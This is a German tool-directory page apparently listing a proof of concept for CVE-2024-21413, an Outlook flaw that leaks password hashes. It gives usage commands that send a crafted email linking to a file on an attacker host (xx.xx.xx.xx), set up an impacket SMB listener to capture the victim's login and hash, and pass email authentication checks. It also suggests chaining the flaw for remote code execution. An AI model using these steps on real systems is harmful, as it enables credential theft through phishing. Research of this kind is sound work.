Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-21413-POC — Microsoft Outlook Sicherheitslücke zur Offenlegung von Informationen (gibt Passwort-Hash preis) - CVE-2024-21413 POC | Kitploit
Tools/GitHubGitHub/r00tb1t/cve-2024-21413-poc
Passwort-CrackingSchwachstellenanalyseExploitationInformationsbeschaffungLernen & BildungE-Mail-Sicherheit
GitHubr00tb1t/cve-2024-21413-poc

CVE-2024-21413-POC

Microsoft Outlook Sicherheitslücke zur Offenlegung von Informationen (gibt Passwort-Hash preis) - CVE-2024-21413 POC

Repository anzeigen
172vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-21413 - POC

Verwendung:

python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf

[!NOTE] r00tb1t : ist die freigegebene Testdatei (in diesem Fall Word) von der Angreifer-Maschine (xx.xx.xx.xx).

Um die Einhaltung von SPF, DKIM und DMARC zu gewährleisten, verwenden Sie eine legitime $IP und Domain.

Stellen Sie sicher, dass Sie die Bibliothek pexpect installieren, falls Sie dies noch nicht getan haben, mit pip install pexpect.

Tipps zum Ausführen des POC:

  • Führen Sie einen SMB-Listener aus impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp .
  • Führen Sie den POC aus

python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url example.com/path/to/shared/file/r0tb1t.rtf

  • Klicken Sie auf den Link in der empfangenen E-Mail, und BOOM – Sie sollten den Login & Hash im Listener abrufen.
  • Verknüpfen Sie diese CVE mit CVE-2023-21716, um RCE zu erhalten !!!
  • Kudooooos & Details zu CVE-2024-21413 .
  • Workaround/Fix:

[!CAUTION] ⚠️ Haftungsausschluss: WICHTIG: Dieses Skript wird ausschließlich für Bildungszwecke, ethische Tests und rechtmäßige Verwendung bereitgestellt. Verwenden Sie es nicht auf einem System oder Netzwerk ohne ausdrückliche Genehmigung. Unbefugter Zugriff auf Computersysteme und Netzwerke ist illegal, und Benutzer, die bei unbefugten Aktivitäten erwischt werden, unterliegen rechtlichen Schritten. Der Autor ist NICHT verantwortlich für Schäden, die durch die missbräuchliche Verwendung dieses Skripts verursacht werden.

Tool herunterladen